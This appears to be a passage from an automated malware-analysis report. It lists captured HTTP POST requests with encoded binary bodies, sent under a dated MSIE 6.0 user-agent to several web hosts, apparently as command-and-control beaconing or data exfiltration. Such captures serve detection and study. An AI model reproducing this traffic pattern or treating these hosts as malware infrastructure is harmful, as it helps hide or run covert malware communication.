76 36 43 59 65 65 72 45 72 6d 37 31 36 6c 56 65 49 76 56 7a 4c 75 74 4f 2f 51 4d 78 35 63 64 69 70 4c 31 50 44 4f 62 6a 64 36 2f 30 69 58 6d 75 53 62 32 34 4c 6d 61 72 46 6d 2b 64 77 43 5a 62 45 49 47 67 65 53 77 4f 68 41 49 41 65 57 4d 6e 57 78 76 55 55 33 31 53 37 35 4a 53 58 6d 79 36 43 59 4c 4e 51 3d 3d Data Ascii: qm/bcmDPFZeekF6as7uK2ZONPNjIAfhdlMzTUNopcLX5MsqSk8FjWJbFe59CPG63u5N0PvPscouMPyHxfyPi3BTzwmlX2Bf/o8Bl5XhRY0nRzz4u1d/wPW6ejKyWyurZxiPAcx8pxwzQiDIdAOneP5YvxXv6DN0S8SbthJsDrd3HkorGfe8dgmSDC1RMibOT9TwU7pTfZUBZ8vdK/yCFuqj1Ab8mahVqPLS/a9IXWBED6pAfiJKPPyeiCXtQvuz8GRm2utkmshtWJvlLrWyU7khKMvdQ/EGPQCtGaSeIuVFHX4bi8w42Mn/SmR6d5dhurkqrGp3bj2xKuGI0Ey7+BcvmODfLdOjl8SLNfZYePuqg+qfg/dcd3CtrFMNKTMR20qYvw3UY1VG2YEcbkZZS7ga8HugDsdoMJDPZTHaQ3859PbkaWT+v8VTKkrW0TcADRSjq7nKCZv6CYeerErm716lVeIvVzLutO/QMx5cdipL1PDObjd6/0iXmuSb24LmarFm+dwCZbEIGgeSwOhAIAeWMnWxvUU31S75JSXmy6CYLNQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 61 50 69 47 56 6c 65 45 4a 5a 66 43 72 4d 64 6f 52 6c 57 51 79 4b 44 49 71 30 36 4e 43 35 31 33 65 32 33 43 76 61 53 57 73 47 57 32 67 42 36 35 76 6e 4d 4d 51 6d 39 2f 38 56 4d 5a 5a 52 47 32 63 30 63 6d 73 73 48 39 43 74 69 2f 2b 45 2f 4c 6b 42 2b 78 52 55 78 6f 44 41 4d 64 50 49 6b 44 69 75 42 38 31 71 71 61 33 45 36 42 58 4a 52 77 53 6b 55 64 73 41 37 36 71 57 53 2b 76 30 5a 43 4d 47 6c 61 79 47 4a 4e 45 33 65 54 48 68 68 2f 55 4d 76 66 62 52 4b 66 37 77 69 6d 70 6a 44 43 72 78 32 44 75 70 73 47 32 46 58 68 56 7a 7a 7a 36 72 32 47 59 44 72 32 69 73 79 31 74 44 53 57 76 63 6e 56 69 56 46 61 6a 37 51 4e 4d 42 2b 48 71 65 46 32 35 64 35 47 59 74 31 41 64 51 75 52 38 6b 62 53 6f 75 34 53 74 2b 73 68 65 6c 48 62 5a 47 78 38 4d 35 6f 53 69 77 6b 43 43 4e 42 6d 6f 56 67 41 77 66 55 38 68 76 6a 4a 67 74 2b 34 58 7a 33 58 48 31 65 67 34 35 36 73 63 2b 66 74 56 6f 34 61 35 6d 54 61 31 7a 31 6c 79 47 4a 65 49 79 35 51 38 61 6f 5a 61 75 4b 4b 43 6c 48 6e 76 54 66 43 78 31 4e 56 71 5a 4d 66 51 79 69 67 72 2b 79 66 64 37 52 79 4c 54 56 35 50 75 45 6c 63 6f 44 4b 56 47 76 45 38 77 50 70 6a 32 44 48 48 37 6f 65 51 51 45 62 74 75 61 72 5a 61 47 72 52 54 38 78 4b 50 77 39 47 53 70 64 67 52 2b 42 51 36 6c 44 36 41 50 2f 50 77 32 64 73 31 71 4e 76 68 76 48 52 49 33 71 39 6f 45 53 61 48 52 2f 4f 6b 2b 66 65 51 69 49 46 4f 7a 6d 5a 69 4f 48 4b 6c 41 58 39 41 62 77 64 61 48 2f 62 4c 58 36 44 32 65 7a 35 73 32 32 2b 51 48 66 61 63 52 6b 75 50 49 46 65 57 6f 62 69 37 2f 6d 33 77 49 56 41 41 48 65 39 52 46 33 69 38 6a 67 33 41 6c 38 4d 4a 6e 53 30 52 31 36 65 70 61 51 43 78 34 61 6f 6c 46 45 70 30 47 34 61 62 59 45 78 57 77 59 4b 31 42 32 75 6b 39 54 30 73 32 47 45 77 3d 3d Data Ascii: aPiGVleEJZfCrMdoRlWQyKDIq06NC513e23CvaSWsGW2gB65vnMMQm9/8VMZZRG2c0cmssH9Cti/+E/LkB+xRUxoDAMdPIkDiuB81qqa3E6BXJRwSkUdsA76qWS+v0ZCMGlayGJNE3eTHhh/UMvfbRKf7wimpjDCrx2DupsG2FXhVzzz6r2GYDr2isy1tDSWvcnViVFaj7QNMB+HqeF25d5GYt1AdQuR8kbSou4St+shelHbZGx8M5oSiwkCCNBmoVgAwfU8hvjJgt+4Xz3XH1eg456sc+ftVo4a5mTa1z1lyGJeIy5Q8aoZauKKClHnvTfCx1NVqZMfQyigr+yfd7RyLTV5PuElcoDKVGvE8wPpj2DHH7oeQQEbtuarZaGrRT8xKPw9GSpdgR+BQ6lD6AP/Pw2ds1qNvhvHRI3q9oESaHR/Ok+feQiIFOzmZiOHKlAX9AbwdaH/bLX6D2ez5s22+QHfacRkuPIFeWobi7/m3wIVAAHe9RF3i8jg3Al8MJnS0R16epaQCx4aolFEp0G4abYExWwYK1B2uk9T0s2GEw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 62 68 4a 56 57 61 65 62 4a 5a 63 4e 33 4a 32 61 56 6d 53 72 47 48 44 73 6d 36 41 64 66 57 54 4f 79 34 6d 70 70 31 63 46 43 30 2f 75 59 58 37 54 4e 78 34 34 74 33 6c 75 6f 6e 31 4b 2b 66 69 70 55 51 47 73 4a 4a 64 2b 45 71 67 36 67 6a 2f 65 61 31 58 64 63 4d 58 35 54 54 49 31 63 67 63 38 79 41 66 66 77 57 43 55 76 75 6e 42 37 70 6d 74 75 57 64 34 5a 4c 55 6d 69 66 6d 54 43 53 77 59 79 77 59 34 44 45 47 6c 63 65 58 62 69 36 4e 61 6f 58 64 2b 76 59 42 62 6c 41 67 54 4a 5a 75 4c 33 35 72 64 35 73 64 38 39 77 46 45 67 4b 4d 65 30 51 4d 54 4a 46 2b 64 6c 77 71 50 36 6a 6b 47 4a 4b 43 2f 49 74 47 70 6f 31 4e 56 44 57 4c 34 76 38 64 49 39 4e 4d 54 6b 5a 6a 66 56 77 59 72 52 67 32 62 6f 33 54 2b 75 51 51 64 77 4e 48 42 48 6b 66 36 6b 49 70 4a 62 5a 62 56 76 5a 39 41 32 66 30 63 6a 4f 4c 42 66 7a 6a 74 6a 75 67 36 53 6a 35 67 68 63 44 62 67 44 4c 71 44 46 35 30 6b 63 6d 4e 66 59 51 54 55 6e 4e 4e 57 63 63 4c 41 48 6d 45 42 4b 4a 32 4d 33 54 52 55 68 76 67 41 4e 45 4d 73 31 30 55 4a 33 74 30 71 4c 44 4d 54 68 67 49 66 58 66 73 4c 78 62 5a 50 37 4e 57 56 73 7a 69 6b 73 72 31 30 4b 33 33 58 56 71 68 66 58 43 37 52 4b 54 43 33 49 75 61 33 49 48 42 67 4a 6d 77 6c 2f 42 6c 62 51 70 48 66 4f 39 32 48 6a 33 55 43 64 2f 41 42 67 32 6d 48 79 6e 49 6c 71 49 34 72 4f 55 76 72 72 56 76 58 50 48 56 78 49 6b 4c 4d 6b 44 68 37 32 34 70 61 4b 63 4d 64 34 67 73 49 6b 70 6f 67 45 69 74 64 65 57 6b 63 47 6b 54 7a 44 52 69 46 6f 75 79 72 35 77 58 5a 49 36 4e 64 43 59 44 57 34 70 45 30 33 33 63 58 62 53 67 38 57 66 75 67 44 66 71 49 42 68 30 4d 37 72 7a 41 6c 61 42 70 72 72 59 69 55 65 47 72 68 32 65 31 71 33 64 2b 63 42 54 77 72 6c 69 43 6f 6f 3d Data Ascii: bhJVWaebJZcN3J2aVmSrGHDsm6AdfWTOy4mpp1cFC0/uYX7TNx44t3luon1K+fipUQGsJJd+Eqg6gj/ea1XdcMX5TTI1cgc8yAffwWCUvunB7pmtuWd4ZLUmifmTCSwYywY4DEGlceXbi6NaoXd+vYBblAgTJZuL35rd5sd89wFEgKMe0QMTJF+dlwqP6jkGJKC/ItGpo1NVDWL4v8dI9NMTkZjfVwYrRg2bo3T+uQQdwNHBHkf6kIpJbZbVvZ9A2f0cjOLBfzjtjug6Sj5ghcDbgDLqDF50kcmNfYQTUnNNWccLAHmEBKJ2M3TRUhvgANEMs10UJ3t0qLDMThgIfXfsLxbZP7NWVsziksr10K33XVqhfXC7RKTC3Iua3IHBgJmwl/BlbQpHfO92Hj3UCd/ABg2mHynIlqI4rOUvrrVvXPHVxIkLMkDh724paKcMd4gsIkpogEitdeWkcGkTzDRiFouyr5wXZI6NdCYDW4pE033cXbSg8WfugDfqIBh0M7rzAlaBprrYiUeGrh2e1q3d+cBTwrliCoo=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 45 63 6f 70 58 44 43 7a 4a 5a 63 37 79 49 77 55 51 79 78 75 62 75 4f 78 47 42 37 59 53 57 34 73 5a 49 57 30 72 58 76 32 72 44 58 55 76 44 52 4a 6c 75 4c 71 66 70 65 49 64 4b 75 7a 68 67 30 48 53 68 6e 74 52 57 7a 62 4e 79 6b 30 71 65 45 59 63 51 49 75 6b 58 7a 43 5a 39 63 4c 57 36 58 54 32 75 7a 61 30 74 6e 68 46 62 66 56 6b 73 45 52 7a 49 32 42 53 35 2f 50 71 53 61 39 74 61 36 4e 41 6e 2f 52 30 47 43 73 76 2f 7a 59 58 55 78 62 52 63 7a 46 38 46 6b 49 73 4d 67 73 51 4c 77 4b 5a 61 39 77 42 46 4a 63 4d 65 76 6b 35 74 69 2f 48 53 4b 63 4f 46 5a 71 76 38 69 79 6b 42 65 42 31 4f 55 65 47 61 39 63 6f 41 56 63 47 34 58 67 46 72 42 44 2f 6b 45 71 37 69 35 55 38 6f 4d 39 38 6c 52 7a 37 38 30 41 6e 50 45 38 78 66 37 4a 6a 71 4c 6e 46 68 37 58 50 4f 68 73 61 39 70 57 69 4e 4e 4c 56 63 6f 4a 46 41 72 66 49 61 63 52 47 36 4e 4f 6e 62 31 49 77 63 6b 36 54 49 4b 67 48 4e 46 39 7a 6c 6c 74 44 5a 46 4c 44 6e 59 6d 43 79 4a 52 58 30 2f 2b 32 41 75 2b 4c 42 4d 57 4e 6a 51 30 6e 62 42 45 59 54 69 57 63 62 77 6d 61 6e 75 56 47 68 57 65 74 47 38 30 77 48 74 4f 6c 6e 64 39 6c 45 46 73 61 34 2b 4f 42 32 5a 4c 6d 2f 53 33 4e 70 69 6f 75 65 6b 32 6c 51 42 79 4c 75 36 45 6b 76 4c 33 46 64 65 4b 30 4b 4a 76 44 32 35 2f 46 32 4f 49 4a 58 45 72 6e 50 6b 5a 71 35 72 79 7a 6a 50 37 43 70 38 50 71 55 55 63 5a 63 56 4f 50 75 4f 66 56 61 4d 71 52 6e 5a 70 62 4e 33 48 58 6f 56 69 30 4f 39 78 68 74 5a 75 48 38 55 2b 36 65 62 6a 68 48 38 4b 34 4d 2f 44 36 64 64 4f 55 38 52 71 74 48 55 55 59 4d 43 62 61 73 63 46 49 76 47 70 72 58 54 6d 4d 31 37 36 61 59 53 76 76 5a 2f 68 71 75 5a 53 6a 6a 34 6d 77 61 73 49 41 47 6e 59 31 62 63 5a 2f 39 6b 59 7a 48 4c 33 59 54 5a 39 63 47 56 45 5a 56 6d 44 45 5a 4c 61 65 53 2f 33 35 5a 74 4b 54 51 3d 3d Data Ascii: EcopXDCzJZc7yIwUQyxubuOxGB7YSW4sZIW0rXv2rDXUvDRJluLqfpeIdKuzhg0HShntRWzbNyk0qeEYcQIukXzCZ9cLW6XT2uza0tnhFbfVksERzI2BS5/PqSa9ta6NAn/R0GCsv/zYXUxbRczF8FkIsMgsQLwKZa9wBFJcMevk5ti/HSKcOFZqv8iykBeB1OUeGa9coAVcG4XgFrBD/kEq7i5U8oM98lRz780AnPE8xf7JjqLnFh7XPOhsa9pWiNNLVcoJFArfIacRG6NOnb1Iwck6TIKgHNF9zlltDZFLDnYmCyJRX0/+2Au+LBMWNjQ0nbBEYTiWcbwmanuVGhWetG80wHtOlnd9lEFsa4+OB2ZLm/S3Npiouek2lQByLu6EkvL3FdeK0KJvD25/F2OIJXErnPkZq5ryzjP7Cp8PqUUcZcVOPuOfVaMqRnZpbN3HXoVi0O9xhtZuH8U+6ebjhH8K4M/D6ddOU8RqtHUUYMCbascFIvGprXTmM176aYSvvZ/hquZSjj4mwasIAGnY1bcZ/9kYzHL3YTZ9cGVEZVmDEZLaeS/35ZtKTQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 4e 59 36 5a 39 71 49 57 47 70 66 78 36 74 74 36 46 61 57 59 67 79 56 51 47 2b 6b 79 48 78 44 37 39 76 61 2b 4c 32 62 4a 47 2b 6b 68 45 71 37 78 39 5a 4c 69 42 79 56 35 73 43 57 65 74 7a 6f 38 47 6c 2f 55 49 35 54 6a 56 49 4c 6a 4b 56 71 76 76 46 70 57 4c 64 70 53 4a 55 76 54 6e 68 46 64 61 6a 72 64 32 58 4a 41 4c 4b 39 79 37 51 46 57 54 62 63 64 67 55 4a 48 57 76 59 76 73 74 72 61 4c 52 53 53 54 35 76 6d 34 31 62 39 62 61 45 46 47 41 4b 55 36 63 53 54 35 45 48 32 4c 2f 51 63 2f 38 6a 6b 68 61 45 58 6c 4c 63 7a 61 6c 4c 72 36 67 7a 51 52 61 67 55 2b 55 51 67 50 44 47 34 72 54 4f 57 75 48 6b 63 64 35 73 5a 74 7a 51 72 4e 5a 31 54 73 5a 55 4b 31 77 79 65 4e 67 37 62 37 76 6f 66 56 70 70 49 5a 32 69 6f 71 36 79 6e 67 4f 74 65 33 6c 57 6d 69 51 34 37 71 4f 52 58 42 33 48 68 6d 63 4f 75 6b 78 64 38 72 53 6e 33 70 57 54 6a 49 77 73 4b 62 49 68 78 45 69 55 6f 76 6c 6e 79 37 6b 71 53 44 54 38 65 6c 63 4a 4e 46 4f 33 30 30 76 52 5a 79 71 54 2f 7a 55 46 37 2f 57 37 68 7a 6c 55 4d 64 71 2f 36 6d 64 41 77 51 31 71 42 6c 47 43 5a 4e 61 5a 4d 39 32 4c 76 62 47 5a 66 5a 4c 51 62 66 67 4d 4b 5a 36 41 71 31 38 6b 51 35 4e 64 72 6c 74 33 56 42 64 5a 33 30 73 58 6b 45 6a 43 61 37 75 31 63 4d 69 44 4d 39 7a 4c 56 44 49 45 45 37 42 57 65 65 74 6d 78 35 63 6b 58 4c 47 6e 6a 51 32 2b 2f 4b 7a 45 2b 54 49 75 51 56 67 74 36 7a 59 30 77 48 47 6a 41 6b 4c 59 79 36 49 42 7a 4b 51 49 37 4d 75 48 77 35 44 5a 45 79 44 6c 74 59 6b 6c 79 74 34 31 2b 37 67 53 73 41 6e 77 4e 43 76 64 57 59 53 49 4f 45 76 39 57 62 6f 38 6d 50 78 57 69 62 32 4d 6f 6f 51 37 73 70 47 47 70 41 30 4e 31 44 48 39 6c 50 61 59 69 63 46 73 39 6b 75 61 6a 48 4f 62 55 30 4e 34 38 56 6a 79 56 6b 71 55 3d Data Ascii: NY6Z9qIWGpfx6tt6FaWYgyVQG+kyHxD79va+L2bJG+khEq7x9ZLiByV5sCWetzo8Gl/UI5TjVILjKVqvvFpWLdpSJUvTnhFdajrd2XJALK9y7QFWTbcdgUJHWvYvstraLRSST5vm41b9baEFGAKU6cST5EH2L/Qc/8jkhaEXlLczalLr6gzQRagU+UQgPDG4rTOWuHkcd5sZtzQrNZ1TsZUK1wyeNg7b7vofVppIZ2ioq6yngOte3lWmiQ47qORXB3HhmcOukxd8rSn3pWTjIwsKbIhxEiUovlny7kqSDT8elcJNFO300vRZyqT/zUF7/W7hzlUMdq/6mdAwQ1qBlGCZNaZM92LvbGZfZLQbfgMKZ6Aq18kQ5Ndrlt3VBdZ30sXkEjCa7u1cMiDM9zLVDIEE7BWeetmx5ckXLGnjQ2+/KzE+TIuQVgt6zY0wHGjAkLYy6IBzKQI7MuHw5DZEyDltYklyt41+7gSsAnwNCvdWYSIOEv9Wbo8mPxWib2MooQ7spGGpA0N1DH9lPaYicFs9kuajHObU0N48VjyVkqU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 59 67 67 75 57 77 4b 72 4a 5a 64 74 70 4d 71 50 39 57 36 74 6e 6f 58 48 45 69 38 53 2b 2f 6c 6b 56 6c 6d 50 4b 75 6d 65 62 43 4f 4f 63 46 72 44 65 49 72 4d 78 75 42 78 2b 62 50 38 4e 48 4c 32 35 45 4f 6c 63 72 77 43 47 32 78 55 76 70 4f 41 6e 68 35 58 33 38 47 65 41 70 4f 35 72 58 34 62 6d 44 2b 42 57 59 47 36 72 41 66 6e 63 78 72 57 69 36 63 4c 2f 56 4d 42 59 37 63 31 77 61 69 33 59 64 61 2f 43 44 43 6a 76 79 75 36 2b 54 72 47 5a 79 74 47 4c 73 4e 64 4c 52 71 6d 4f 65 4d 4c 6c 64 6e 74 54 59 41 4a 71 35 31 55 55 43 59 48 79 36 68 45 70 34 54 70 4f 46 71 78 38 68 68 39 53 69 54 33 47 54 43 52 6d 4c 33 41 4e 4a 71 4a 71 66 64 73 63 74 58 64 5a 5a 70 7a 30 4d 49 58 53 6f 6c 65 51 68 68 50 56 72 68 35 56 6b 51 69 4b 6e 50 6b 58 6c 35 74 74 51 47 44 58 6c 72 31 75 79 74 39 79 76 42 74 35 7a 52 61 58 62 53 57 46 30 45 77 66 58 52 79 68 62 36 48 53 58 42 6f 6a 51 6e 2f 32 4b 39 4f 6b 2b 6e 42 61 38 51 74 2f 76 4f 38 43 76 32 4a 42 68 68 37 39 4c 57 2b 64 39 5a 6d 6e 47 79 42 71 43 35 49 4a 70 34 71 77 4c 76 50 74 52 6a 5a 54 4b 66 71 7a 6f 4b 41 32 33 45 68 75 37 55 53 6a 39 78 35 6f 72 67 49 6c 34 76 6e 47 4e 36 59 32 42 56 48 41 44 76 47 48 63 38 73 66 7a 5a 38 79 45 63 35 56 71 6b 56 73 4e 7a 36 56 68 55 56 6c 33 59 59 57 37 73 70 37 7a 75 48 6a 70 43 37 53 76 4a 49 62 6d 45 74 78 58 6c 57 75 34 70 2f 2b 4b 70 42 33 75 41 6c 51 33 36 38 68 30 4a 30 58 2f 57 37 6a 38 73 4f 78 4b 5a 66 4e 38 6c 73 59 51 72 5a 2f 32 6c 31 42 58 47 6a 75 7a 59 50 68 58 78 6f 6d 53 4c 48 49 68 4d 66 4b 57 42 76 71 36 43 68 59 6a 45 43 37 42 67 62 55 37 44 34 48 59 4e 44 63 69 77 52 53 32 34 56 69 34 6d 48 67 4d 71 55 76 6e 69 43 2b 56 4a 79 38 59 4f 45 50 46 45 38 55 34 4e 48 48 6e 61 62 53 42 39 74 Data Ascii: YgguWwKrJZdtpMqP9W6tnoXHEi8S+/lkVlmPKumebCOOcFrDeIrMxuBx+bP8NHL25EOlcrwCG2xUvpOAnh5X38GeApO5rX4bmD+BWYG6rAfncxrWi6cL/VMBY7c1wai3Yda/CDCjvyu6+TrGZytGLsNdLRqmOeMLldntTYAJq51UUCYHy6hEp4TpOFqx8hh9SiT3GTCRmL3ANJqJqfdsctXdZZpz0MIXSoleQhhPVrh5VkQiKnPkXl5ttQGDXlr1uyt9yvBt5zRaXbSWF0EwfXRyhb6HSXBojQn/2K9Ok+nBa8Qt/vO8Cv2JBhh79LW+d9ZmnGyBqC5IJp4qwLvPtRjZTKfqzoKA23Ehu7USj9x5orgIl4vnGN6Y2BVHADvGHc8sfzZ8yEc5VqkVsNz6VhUVl3YYW7sp7zuHjpC7SvJIbmEtxXlWu4p/+KpB3uAlQ368h0J0X/W7j8sOxKZfN8lsYQrZ/2l1BXGjuzYPhXxomSLHIhMfKWBvq6ChYjEC7BgbU7D4HYNDciwRS24Vi4mHgMqUvniC+VJy8YOEPFE8U4NHHnabSB9t
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 45 63 6f 70 58 44 43 7a 4a 5a 63 37 79 49 77 55 51 79 78 75 62 75 4f 78 47 42 37 59 53 57 34 73 5a 49 57 30 72 58 76 32 72 44 58 55 76 44 52 4a 6c 75 4c 71 66 70 65 49 64 4b 75 7a 68 67 30 48 53 68 6e 74 52 57 7a 62 4e 79 6b 30 71 65 45 59 63 51 49 75 6b 58 7a 43 5a 39 63 4c 57 36 58 54 32 75 7a 61 30 74 6e 68 46 62 66 56 6b 73 45 52 7a 49 32 42 53 35 2f 50 71 53 61 39 74 61 36 4e 41 6e 2f 52 30 47 43 73 76 2f 7a 59 58 55 78 62 52 63 7a 46 38 46 6b 49 73 4d 67 73 51 4c 77 4b 5a 61 39 77 42 46 4a 63 4d 65 76 6b 35 74 69 2f 48 53 4b 63 4f 46 5a 71 76 38 69 79 6b 42 65 42 31 4f 55 65 47 61 39 63 6f 41 56 63 47 34 58 67 46 72 42 44 2f 6b 45 71 37 69 35 55 38 6f 4d 39 38 6c 52 7a 37 38 30 41 6e 50 45 38 78 66 37 4a 6a 71 4c 6e 46 68 37 58 50 4f 68 73 61 39 70 57 69 4e 4e 4c 56 63 6f 4a 46 41 72 66 49 61 63 52 47 36 4e 4f 6e 62 31 49 77 63 6b 36 54 49 4b 67 48 4e 46 39 7a 6c 6c 74 44 5a 46 4c 44 6e 59 6d 43 79 4a 52 58 30 2f 2b 32 41 75 2b 4c 42 4d 57 4e 6a 51 30 6e 62 42 45 59 54 69 57 63 62 77 6d 61 6e 75 56 47 68 57 65 74 47 38 30 77 48 74 4f 6c 6e 64 39 6c 45 46 73 61 34 2b 4f 42 32 5a 4c 6d 2f 53 33 4e 70 69 6f 75 65 6b 32 6c 51 42 79 4c 75 36 45 6b 76 4c 33 46 64 65 4b 30 4b 4a 76 44 32 35 2f 46 32 4f 49 4a 58 45 72 6e 50 6b 5a 71 35 72 79 7a 6a 50 37 43 70 38 50 71 55 55 63 5a 63 56 4f 50 75 4f 66 56 61 4d 71 52 6e 5a 70 62 4e 33 48 58 6f 56 69 30 4f 39 78 68 74 5a 75 48 38 55 2b 36 65 62 6a 68 48 38 4b 34 4d 2f 44 36 64 64 4f 55 38 52 71 74 48 55 55 59 4d 43 62 61 73 63 46 49 76 47 70 72 58 54 6d 4d 31 37 36 61 59 53 76 76 5a 2f 68 71 75 5a 53 6a 6a 34 6d 77 61 73 49 41 47 6e 59 31 62 63 5a 2f 39 6b 59 7a 48 4c 33 59 54 5a 39 63 47 56 45 5a 56 6d 44 45 5a 4c 61 65 53 2f 33 35 5a 74 4b 54 51 3d 3d Data Ascii: EcopXDCzJZc7yIwUQyxubuOxGB7YSW4sZIW0rXv2rDXUvDRJluLqfpeIdKuzhg0HShntRWzbNyk0qeEYcQIukXzCZ9cLW6XT2uza0tnhFbfVksERzI2BS5/PqSa9ta6NAn/R0GCsv/zYXUxbRczF8FkIsMgsQLwKZa9wBFJcMevk5ti/HSKcOFZqv8iykBeB1OUeGa9coAVcG4XgFrBD/kEq7i5U8oM98lRz780AnPE8xf7JjqLnFh7XPOhsa9pWiNNLVcoJFArfIacRG6NOnb1Iwck6TIKgHNF9zlltDZFLDnYmCyJRX0/+2Au+LBMWNjQ0nbBEYTiWcbwmanuVGhWetG80wHtOlnd9lEFsa4+OB2ZLm/S3Npiouek2lQByLu6EkvL3FdeK0KJvD25/F2OIJXErnPkZq5ryzjP7Cp8PqUUcZcVOPuOfVaMqRnZpbN3HXoVi0O9xhtZuH8U+6ebjhH8K4M/D6ddOU8RqtHUUYMCbascFIvGprXTmM176aYSvvZ/hquZSjj4mwasIAGnY1bcZ/9kYzHL3YTZ9cGVEZVmDEZLaeS/35ZtKTQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 36 44 6e 2b 57 4e 61 59 4a 5a 63 2b 66 53 51 69 73 66 6f 69 30 58 6e 30 33 6a 70 32 4c 36 30 68 61 6c 70 54 39 7a 50 65 50 65 55 37 64 59 78 6a 68 54 77 4f 49 4f 7a 37 38 72 33 30 75 33 76 59 67 5a 53 6a 69 79 77 53 4d 73 6d 5a 79 77 62 68 49 4f 59 35 6e 57 32 57 72 75 62 69 62 52 72 66 57 2b 4c 32 46 51 49 39 78 74 67 53 2b 67 57 6e 52 6e 2b 65 47 30 5a 62 76 39 69 43 4b 45 4c 39 79 57 42 55 46 69 74 4e 73 37 64 2b 53 6b 68 49 6f 32 51 43 48 50 5a 31 51 57 31 36 4e 4f 4e 73 31 49 65 58 76 4c 55 4d 59 78 47 46 75 67 36 50 34 38 49 71 76 6f 32 59 7a 66 4a 72 4b 54 4f 6b 6f 6c 75 4f 30 4c 34 78 31 4e 57 6d 45 7a 59 4c 59 49 56 49 38 69 63 6a 33 4e 43 6a 6d 34 2b 44 73 71 51 2b 79 42 41 44 69 51 45 4d 62 54 6a 6f 38 45 53 79 46 36 32 42 66 51 33 4c 2b 33 6d 78 59 34 67 69 69 70 47 6c 79 6a 57 64 78 75 38 76 32 4f 35 51 62 58 36 58 47 73 57 62 4b 70 69 4b 39 62 77 53 6d 57 43 2f 31 6a 4b 75 6a 59 67 36 57 53 38 48 47 7a 4e 6e 5a 52 53 56 57 32 2b 74 52 57 65 74 44 34 71 34 69 59 70 73 32 4d 39 58 41 44 74 55 67 63 67 38 32 79 53 34 32 6a 43 2f 43 61 65 76 74 31 70 2f 4e 4a 72 35 6b 46 67 43 6d 4f 6d 69 50 74 79 74 6b 73 5a 6a 73 2b 46 4d 76 58 63 71 47 6b 71 6a 54 42 38 73 42 44 65 76 52 45 42 47 5a 37 78 2f 66 42 37 57 6b 35 34 37 66 7a 38 30 2f 70 43 67 48 50 47 52 76 79 37 73 37 39 71 70 45 2f 50 55 6d 73 64 38 51 4c 64 67 56 73 59 72 6c 36 48 42 2b 74 78 6d 72 69 4f 64 39 68 33 4b 35 66 36 4b 6a 6a 55 45 4c 35 74 76 4d 48 75 32 62 49 72 70 44 55 73 79 45 65 57 79 76 75 42 58 64 45 46 6b 6a 32 2f 4e 2f 47 71 44 58 48 70 68 31 34 2b 78 68 2b 47 79 5a 39 2b 4d 35 77 76 37 76 2b 57 64 4b 55 47 55 53 63 33 77 6c 31 4f 54 Data Ascii: 6Dn+WNaYJZc+fSQisfoi0Xn03jp2L60halpT9zPePeU7dYxjhTwOIOz78r30u3vYgZSjiywSMsmZywbhIOY5nW2WrubibRrfW+L2FQI9xtgS+gWnRn+eG0Zbv9iCKEL9yWBUFitNs7d+SkhIo2QCHPZ1QW16NONs1IeXvLUMYxGFug6P48Iqvo2YzfJrKTOkoluO0L4x1NWmEzYLYIVI8icj3NCjm4+DsqQ+yBADiQEMbTjo8ESyF62BfQ3L+3mxY4giipGlyjWdxu8v2O5QbX6XGsWbKpiK9bwSmWC/1jKujYg6WS8HGzNnZRSVW2+tRWetD4q4iYps2M9XADtUgcg82yS42jC/Caevt1p/NJr5kFgCmOmiPtytksZjs+FMvXcqGkqjTB8sBDevREBGZ7x/fB7Wk547fz80/pCgHPGRvy7s79qpE/PUmsd8QLdgVsYrl6HB+txmriOd9h3K5f6KjjUEL5tvMHu2bIrpDUsyEeWyvuBXdEFkj2/N/GqDXHph14+xh+GyZ9+M5wv7v+WdKUGUSc3wl1OT
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 65 5a 6f 43 56 4f 4d 50 4e 70 66 6a 79 38 6c 61 61 6a 4f 74 41 51 77 34 58 6d 59 4a 66 4a 36 6c 78 34 4d 35 6c 6e 59 6a 61 37 54 44 44 51 66 42 62 33 52 45 6f 66 49 6f 30 37 6e 2f 39 78 4f 6f 50 70 73 55 58 63 33 73 72 30 5a 44 65 66 50 67 6b 6e 54 66 32 44 48 72 58 50 70 59 63 74 4c 33 79 74 61 66 55 65 6e 74 65 4d 37 6b 34 66 69 79 35 31 45 51 6b 37 38 42 57 2b 49 43 68 6e 33 6a 55 63 71 61 38 6f 73 4b 58 39 6b 36 63 69 55 34 34 34 36 78 49 66 7a 67 6d 4c 46 71 53 38 4b 56 38 61 41 6d 2f 5a 63 53 39 45 52 64 4f 4a 53 36 39 61 47 38 4d 78 64 74 6f 5a 39 55 59 4e 31 39 31 30 52 68 35 6d 6c 34 74 6d 42 6a 4f 66 2b 35 49 33 44 75 74 63 6e 